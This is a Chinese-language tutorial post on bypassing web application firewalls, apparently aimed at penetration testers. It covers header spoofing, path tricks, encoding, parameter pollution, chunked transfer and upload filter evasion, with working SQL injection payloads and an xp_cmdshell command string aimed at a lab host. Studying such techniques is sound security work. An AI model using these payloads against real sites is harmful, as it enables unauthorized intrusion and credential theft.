布满杂草的荆棘
布满杂草的荆棘

waf绕过

1.市场Waf分类
  

硬件Waf:绿盟、安恒、启明、知道创宇等
        需要选择模式
        透明模式
        反向代理分为反向代理(代理模式)与反向代理(牵引模式)
        反向代理又分为两种模式,反向代理(代理模式)与反向代理(牵引模式)
        旁路监控
软件Waf:安全狗、云锁、中间件自带的Waf模块
云WAF:阿里云、安全狗、知道创宇、安恒

2.WAF的检测方法
  

首先白名单黑名单身份认证--数据包解析--规则判断--拦截     

waf绕过_第1张图片    

3.身份认证阶段绕过
    

  • 伪造搜索引擎绕过

        waf绕过_第2张图片

waf绕过_第3张图片

  •  伪造白名单的特殊目录

        admin/../  方式绕过
        http://10.0.0.139:92/pikachu/pkxss/admin/../pkxss_login.php
         waf绕过_第4张图片

4.数据包解析绕过
  

  •  1、burp安装waf模块

云WAF绕过方法:伪造XFF头为127.0.0.1或找出真实IP绕过 
 安装插件
     waf绕过_第5张图片waf绕过_第6张图片     

waf绕过_第7张图片

     

waf绕过_第8张图片

waf绕过_第9张图片

    waf绕过_第10张图片      waf绕过_第11张图片   waf绕过_第12张图片 加一些路径
         waf绕过_第13张图片     waf绕过_第14张图片                                  

  • 2、通过工具伪造百度、google等user agent头或者伪造白名单特殊目录
  •  3、编码url绕过

  输入and 1=1

waf绕过_第15张图片
将and换位&&

waf绕过_第16张图片
进行url编码
                 

waf绕过_第17张图片

 waf绕过_第18张图片

 去掉1=1

waf绕过_第19张图片
将1=1换位-1=-1

waf绕过_第20张图片
    4、修改请求方式绕过:利用waf的默认规则绕过,如默认只针对拦截,不对post拦截
        对方支持request
 waf绕过_第21张图片      为request就是可以

waf绕过_第22张图片
          waf绕过_第23张图片

  •  5、复合参数绕过

        http://10.0.0.139:92/sql.php?id=1&id=and&id=1=2

  •     6、WAF触发规则的绕过

   内联注释代替空格/**/代替空格
     http://10.0.0.139:92/sql.php?id=1/*|%23--%23|*/and/*|%23--%23|*/-1=-1

waf绕过_第24张图片
特殊字符拼接
            例如: exec('maste'+'r..xp'+'_cmdshell'+'"net user"')
注释包含关键字
            /*!*/包含关键词
                GET /pen/news.php?id=1 /*!union*/ /*!select*/  user,password /*!from*/ mysql.user
            and /*!1*/=/*!1*/ #
                加!是被执行
            Lucy' order /*!11440 by*/ 1,2#
                跟这个数字有关,这是一个版本
            -1'  union /*!77777cz*//*!77777cz*/ select database/*!77777a*/(),2#
使用大小写
            http://www.***.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
双写绕过
            http://www.***.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
关键字替换
            xor异或绕过
            mod绕过
            = | like|in、group_concat() | concat_ws()、@@version | version()
利用WAF本身的功能绕过利用*代替空格
            ,如uni*on+sel*ect+1,2,3,4....
组合法
            and /*!1=1*/ %23
            把and为&&,urlencode后为%26%26  如:%20%26%26%20-1=-2

  •     7、分块传输绕过

 支持get 或request
  变更请求方法

waf绕过_第25张图片
 使用分块传输

waf绕过_第26张图片
 0代表传输完成

waf绕过_第27张图片

  • 8.利用其他变量或命令执行语句

      and mod(8,7) in (1)
      and mod(8,7) in (2)
       异或运算(测注入点)xor
            vince ' Xor '1'='1' #
            vince ' Xor '1'='2' #     

5.文件上传绕过
    

  • 方法一:等号绕过

        被waf拦截

waf绕过_第28张图片
 上传成功
           waf绕过_第29张图片     waf绕过_第30张图片

  •     方法二:换行绕过

waf绕过_第31张图片

  •     方法三:填充垃圾字符

        在from-data前加一些垃圾字符
            waf绕过_第32张图片

waf绕过_第33张图片

  •     方法四:突破0,文件名前缀加[0x09]绕过

  •         方法五:文件名去掉双引号绕过

6.XSS绕过Waf
  

  • HTML5 新标签

        
        


          

          audio标签